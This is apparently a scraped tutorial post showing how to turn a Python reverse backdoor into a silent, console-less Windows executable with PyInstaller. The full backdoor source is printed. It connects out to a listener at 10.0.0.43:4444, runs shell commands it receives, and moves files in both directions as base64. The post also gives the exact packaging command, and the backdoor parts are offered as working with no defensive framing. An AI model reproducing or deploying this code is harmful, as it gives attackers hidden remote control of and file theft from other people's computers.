PACKAGING

  • Convert python program into an executable that:

    • Packages all program files into a single executable.
    • Works without a python interpreter.
    • Get executed when double-clicked.
  • For best results package the program from the same OS as the target.

    • EG if the target is Windows then package the program from a Windows computer with a python interpreter.

Install PyInstaller firstly.

Refer to : https://pyinstaller.readthedocs.io/en/latest/installation.html

Polish the backdoor code to fit the silent executable.

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

import sys

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        DEVNULL = open(os.devnull, "wb")

        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            try:

                if command[0] == "exit":

                    self.connection.close()

                    sys.exit()

                elif command[0] == "cd" and len(command) > 1:

                    command_result = self.change_working_directory_to(command[1])

                elif command[0] == "upload":

                    command_result = self.write_file(command[1], command[2])

                elif command[0] == "download":

                    command_result = self.read_file(command[1]).decode()

                else:

                    command_result = self.execute_system_command(command).decode()

            except Exception:

                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Convert the python program to an executable program.

C:\Python37\Scripts\pyinstaller.exe reverse_backdoor.py --onefile --noconsole

Find and double-click the reverse-backdoor.exe program in the dist folder.

The executable program runs perfectly.

最新文章

  1. location对象
  2. log4j2配置详解
  3. 在VS中向命令行添加参数的方法
  4. [置顶] HashMap HashTable HashSet区别剖析
  5. ASP.NET MVC 4框架揭秘(微软6任MVP,高级软件顾问蒋金楠新作)
  6. Java标准输入输出流的重定向及恢复
  7. code forces Jeff and Periods
  8. android自定义控件之滚动广告条
  9. (原)python中matplot中获得鼠标点击的位置及显示灰度图像
  10. 弹出框layer的使用封装
  11. JUnit三分钟教程 ---- 实际应用
  12. 【HDU 4451 Dressing】水题,组合数
  13. Java学习笔记九(泛型)
  14. HDU4869:Turn the pokers(费马小定理+高速幂)
  15. Java学习笔记——设计模式之四.代理模式
  16. 在腾讯云上搭建WordPress博客
  17. 洛谷P3434 [POI2006]KRA-The Disks(线段树)
  18. c# Web.config中 windows连接数据库
  19. 数据可视化 seaborn绘图(1)
  20. C#添加IIS站点

热门文章

  1. JVM面试题总结
  2. JSON Web令牌(JWT)介绍与使用
  3. ODBC 常见数据源配置整理
  4. JavaWeb网上图书商城完整项目--day02-2.regist页面输入框得到焦点隐藏label
  5. jni不通过线程c回调java的函数
  6. SpringMVC 学习笔记(四)
  7. Spring:一、基本模块思维导图
  8. python文件处理-根据txt列表将文件从其他文件夹 拷贝到指定目录
  9. Scrapy框架简介及小项目应用
  10. 【Spring】内嵌Tomcat&去Xml&调试Mvc